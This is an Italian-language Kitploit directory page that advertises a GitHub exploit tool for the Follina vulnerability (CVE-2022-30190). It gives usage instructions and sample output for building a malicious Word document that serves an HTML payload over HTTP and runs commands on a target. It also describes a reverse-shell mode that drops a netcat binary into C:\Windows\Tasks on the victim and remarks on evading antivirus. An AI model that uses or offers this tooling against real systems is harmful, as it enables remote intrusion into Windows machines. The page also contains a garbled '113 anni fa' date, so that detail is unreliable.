Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
FOLLINA-CVE-2022-30190 — Implementazione di FOLLINA-CVE-2022-30190 | Kitploit
Strumenti/GitHubGitHub/toxicenvelope/follina-cve-2022-30190
Generazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHubtoxicenvelope/follina-cve-2022-30190

FOLLINA-CVE-2022-30190

Implementazione di FOLLINA-CVE-2022-30190

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Vedi Repository
113 anni faNon ancora revisionato
Condividi

FOLLINA-CVE-2022-30190

Implementazione di FOLLINA-CVE-2022-30190


Questo repository contiene uno strumento di sfruttamento per la vulnerabilità FOLLINA-CVE-2022-30190

Disclaimer

Questo strumento è sviluppato per scopi di test di sicurezza e ricerca. Clonando o facendo il fork di questo strumento, lo sviluppatore originale declina ogni responsabilità per le azioni degli attori.


Prerequisiti

  1. leggere informazioni su CVE-2022-30190 da qui
  2. preparare il proprio ambiente di test (suggerisco di usare Virtual Box + Vagrant)
  • Scaricare VirtualBox da qui
  • Scaricare Vagrant da qui
  • Leggere sulla CLI di Vagrant da qui

Creare un attacco MS-MSDT "Follina" con un documento Microsoft Word malevolo e ospitare un payload tramite un server HTTP.

Utilizzo
root@kitploit:~
usage: exploit.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT 
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT           
                        port to serve the HTTP server (default: 8000)

Esempi

Esegui calc.exe:

root@kitploit:~
$ python3 exploit.py   
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./cve202230190.doc
[+] serving html payload on :8000

Esegui cmd.exe:

root@kitploit:~
$ python3 exploit.py --command "cmd"

Ottieni una reverse shell sulla porta 9001. Nota, questo scarica un binario netcat sulla vittima e lo posiziona in C:\Windows\Tasks. Non pulisce il binario. Questo attiverà le rilevazioni antivirus a meno che l'AV non sia disabilitato.

root@kitploit:~
$ python3 exploit.py --reverse 9001
Scarica lo strumento